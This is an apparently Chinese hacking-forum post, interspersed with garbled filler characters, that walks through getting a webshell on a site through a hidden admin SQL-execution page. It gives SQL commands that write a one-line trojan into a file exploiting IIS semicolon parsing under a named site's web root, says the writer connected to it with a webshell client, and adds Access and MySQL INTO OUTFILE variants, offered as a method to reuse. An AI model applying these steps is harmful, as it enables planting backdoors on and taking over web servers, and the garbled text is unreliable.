好不容易进了后台,发现啥上传啊。备份啊多木有。, a; Z: x& l& L u+ P
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的2 j* T# F) \: S3 c
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,7 a% R$ B. V7 i, U' _
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:$ k$ i! I6 G+ a$ E
1.create table cmd (a varchar(50))
$ h5 W1 ?+ k+ F7 h& l/ `8 ] a: @/ ]- [2.insert into cmd (a) values (‘‘)
: b: b$ G B- g; V5 g" d6 {3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd- C5 O; S/ ]. c, X! Q
(把表cmd的内容导出为物理路径的一个EXCEL文件)
- l: R, R8 `- V. [! j7 ]4.drop table cmd
5 x$ J( l7 F' P3 F利用IIS的BUG成功拿到了WEBSHELL。
. X) ]1 Y! e8 ]1 H8 p4 R4 n
( {: w; c6 k* F9 F; ^直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 x. i" n& P+ y' O& x0 `2 l" i0 H. t9 L
SQL语句意思解释:
6 v6 J7 ?" g1 j5 G0 g, ] 第一句
6 |, e3 o! W( [6 i0 S 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50# w |5 C2 e4 }$ V9 Y1 w' u
, B% t( `. B x
第二句
, F5 P$ x* ?8 Z! C! p4 R 在表cmd的a字段插入一句话木马5 [* o# z5 J/ |
第三句
4 i9 S* V. c) T$ k: f# { 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
1 Z' R# R2 H4 H7 F! x5 a' a; v* \9 x/ K$ m
第四句
6 q8 r9 ] V; `' N" g# Z( o7 l/ o' B 删除建立的cmd表; C5 ]2 q4 N; G8 y
7 K7 g' |* w& } U 以下内容为测试:6 Z# } o, Z9 S7 v& y1 b$ K
Access利用后台SQL执行命令功能导出WebShell:3 U7 K3 R/ a! Q, @; d
这个更简单:2 \/ ]# e2 G" E
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]0 x/ }* h2 S! `. e( Y! ^
或者
' N& c7 Y& s, B# D! r# @ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]' `8 |2 D! P+ r4 o) p1 g4 B' j
4 ~8 \3 k4 b! x' V p/ q2 K. w# U 后台有执行SQL语句功能(vote为已知表段)
6 Z7 k* B$ v) n. g* [5 d1 [4 X) _ 希望对大家有所帮助拿shell的又一个思路
' k3 `# Z# M% ^* L0 S; r |